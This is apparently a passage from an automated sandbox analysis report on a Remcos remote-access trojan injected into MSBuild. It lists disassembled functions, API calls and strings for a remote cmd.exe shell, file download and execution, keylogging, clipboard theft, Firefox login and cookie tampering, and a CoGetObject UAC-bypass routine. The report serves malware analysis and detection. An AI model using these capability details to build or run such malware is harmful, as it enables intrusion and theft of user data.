                                                • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                Function 0044EEB5 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 528 44eeb5-44eec2 call 448706 530 44eec7-44eed2 528->530 531 44eed4-44eed6 530->531 532 44eed8-44eee0 530->532 533 44ef20-44ef2e call 446ac5 531->533 532->533 534 44eee2-44eee6 532->534 535 44eee8-44ef1a call 44772e 534->535 540 44ef1c-44ef1f 535->540 540->533
                                                APIs
                                                  • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                • _free.LIBCMT ref: 0044EF21
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                • Instruction ID: 91765bf56145836b352927287b0900a7be963fc320189fecf9c5ab0789588b10
                                                • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                • Instruction Fuzzy Hash: 2D01DB771043056BF321CF66984595AFBD9FB8A370F65051EE59453280EB34A806C778
                                                Function 00448706 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 541 448706-448711 542 448713-44871d 541->542 543 44871f-448725 541->543 542->543 544 448753-44875e call 445354 542->544 545 448727-448728 543->545 546 44873e-44874f RtlAllocateHeap 543->546 551 448760-448762 544->551 545->546 547 448751 546->547 548 44872a-448731 call 4447c5 546->548 547->551 548->544 554 448733-44873c call 442200 548->554 554->544 554->546
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED
                                                Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 557 446aff-446b0b 558 446b3d-446b48 call 445354 557->558 559 446b0d-446b0f 557->559 566 446b4a-446b4c 558->566 561 446b11-446b12 559->561 562 446b28-446b39 RtlAllocateHeap 559->562 561->562 563 446b14-446b1b call 4447c5 562->563 564 446b3b 562->564 563->558 569 446b1d-446b26 call 442200 563->569 564->566 569->558 569->562
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF

                                                Non-executed Functions

                                                Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                  • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                  • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                • Sleep.KERNEL32(000007D0), ref: 00407976
                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                  • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                • API String ID: 2918587301-599666313
                                                • Opcode ID: 837214dce98ca1b2b2073b1697b820e369ac81518af4a92b317c91ee19e5831a
                                                • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                • Opcode Fuzzy Hash: 837214dce98ca1b2b2073b1697b820e369ac81518af4a92b317c91ee19e5831a
                                                • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0040508E
                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                • __Init_thread_footer.LIBCMT ref: 004050CB
                                                • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                • CloseHandle.KERNEL32 ref: 004053CD
                                                • CloseHandle.KERNEL32 ref: 004053D5
                                                • CloseHandle.KERNEL32 ref: 004053E7
                                                • CloseHandle.KERNEL32 ref: 004053EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                • API String ID: 3815868655-81343324
                                                • Opcode ID: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                • Opcode Fuzzy Hash: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                  • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                  • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                  • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                • API String ID: 65172268-860466531
                                                • Opcode ID: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                • Opcode Fuzzy Hash: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                • FindClose.KERNEL32(00000000), ref: 0040B517
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseFile$FirstNext
                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                • API String ID: 1164774033-3681987949
                                                • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Close$File$FirstNext
                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                • API String ID: 3527384056-432212279
                                                • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                • API String ID: 726551946-3025026198
                                                • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32 ref: 004159C7
                                                • EmptyClipboard.USER32 ref: 004159D5
                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                • CloseClipboard.USER32 ref: 00415A5A
                                                • OpenClipboard.USER32 ref: 00415A61
                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                • CloseClipboard.USER32 ref: 00415A89
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                • String ID:
                                                • API String ID: 3520204547-0
                                                • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0$1$2$3$4$5$6$7
                                                • API String ID: 0-3177665633
                                                • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00409B3F
                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                • GetKeyState.USER32(00000010), ref: 00409B5C
                                                • GetKeyboardState.USER32(?), ref: 00409B67
                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                • String ID: 8[G
                                                • API String ID: 1888522110-1691237782
                                                • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 00406788
                                                • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Object_wcslen
                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                • API String ID: 240030777-3166923314
                                                • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                • GetLastError.KERNEL32 ref: 00419935
                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                • String ID:
                                                • API String ID: 3587775597-0
                                                • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                • String ID: <D$<D$<D
                                                • API String ID: 745075371-3495170934
                                                • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
